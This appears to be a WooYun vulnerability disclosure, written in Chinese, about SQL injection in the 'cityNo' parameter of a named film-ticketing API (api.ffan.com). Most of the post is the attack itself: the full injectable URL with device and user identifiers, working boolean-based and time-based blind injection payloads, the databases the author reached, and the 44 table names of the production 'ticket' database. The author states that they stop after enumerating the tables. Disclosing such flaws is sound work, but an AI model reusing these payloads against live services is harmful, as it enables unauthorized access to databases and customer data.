WooYun.org

1,本来是要找APP的漏洞的,今天不是休息嘛,结果找到了app调用后台的SQL注入,泄露了很多东西
2,废话少说,注入点:
http://api.ffan.com/film/v2/film/lists?cityNo=320100&imei=525af1deaf994570ae27070eb4b8b0f064d3ef4c&userId=15000000009411631&version=1&wdId=db9f5185ab0beb3c4b6ea459952918c2&FFClientVersion=21010&ddId=525af1deaf994570ae27070eb4b8b0f064d3ef4c&FFClientType=2&publishStatus=1
万万没有想到是cityNo存在注入点吧
Parameter: cityNo (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cityNo=320100' AND 2633=2633 AND 'XTMk'='XTMk&imei=525af1deaf9945709952918c2&FFClientVersion=21010&ddId=525af1deaf994570ae27070eb4b8b0f064d3ef4c&FF
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cityNo=320100' AND (SELECT * FROM (SELECT(SLEEP(5)))YGiJ) AND 'xUCt&wdId=db9f5185ab0beb3c4b6ea459952918c2&FFClientVersion=21010&ddId=525af1deaf9945
---
available databases [3]:
[*] information_schema
[*] test
[*] ticket
3,看看有那些表,吓死宝宝了
Database: ticket
[44 tables]
+----------------------------+
| audit |
| certificate |
| certificate_synchronize |
| film |
| film_certificate_to_data |
| film_cinema |
| film_city |
| film_city_mapping |
| film_company |
| film_coupon | 是优惠券吗?
| film_coupon_film |
| film_detail |
| film_dimen |
| film_followed |
| film_grade |
| film_hall |
| film_in_time |
| film_lottery |
| film_lottery_number |
| film_lottery_prize |
| film_lottery_winning |
| film_mapping |
| film_preferential |
| film_preferential_margin |
| film_preferential_store |
| film_preferential_user_log |
| film_sale_margin |
| film_sale_user_log |
| film_seat |
| film_show |
| film_ticket_check |
| film_type |
| marketing_plan | 是销售计划吗
| order_product |
| product |
| product_oper_record |
| product_package |
| product_pic |
| product_spec |
| product_spec_temp |
| product_stock |
| product_store |
| sms_queue |
| third_certificate |
+----------------------------+
4,好吧,我就不继续了